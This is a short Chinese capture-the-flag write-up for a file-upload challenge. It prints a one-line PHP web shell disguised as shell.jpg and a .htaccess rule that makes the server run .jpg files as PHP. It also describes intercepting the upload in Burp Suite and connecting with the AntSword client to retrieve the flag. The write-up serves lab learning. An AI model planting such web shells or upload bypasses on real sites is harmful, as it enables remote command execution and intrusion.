1.题目描述
2.打开题目链接
3.上传shell.jpg文件,显示连接成功,但是用蚁剑连接却连接不上。shell文件内容为
<script language='php'>eval($_REQUEST[cmd]);</script>
4.用bp抓包,修改属性
5.需要上传一个.htaccess的文件来把jpg后缀的文件全都当作php文件来执行,.htsccess文件内容为
AddType application/x-httpd-php .jpg
6.刚刚我们上传了shell.jpg
就接下来上传.htaccess文件,修改这里
7.接下来我们放包回去,点击forward
8.接下来我们访问shell.jpg文件
访问地址为
http://97d484a8-851f-4d4d-9507-aa835dd782f4.node5.buuoj.cn:81/upload/8d47dd0461a3a88317b0af687ebf8526/shell%20.jpg
9.接下来我们使用蚁剑连接
flag{3687354e-fb5d-415c-b5ec-0c92e80df3e4}
![[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解](https://ucc.alicdn.com/pic/developer-ecology/p5p4weppao3em_6196bea7b85e43ae88067b12f480beb1.png?x-oss-process=image/format,webp/resize,h_160,m_lfit)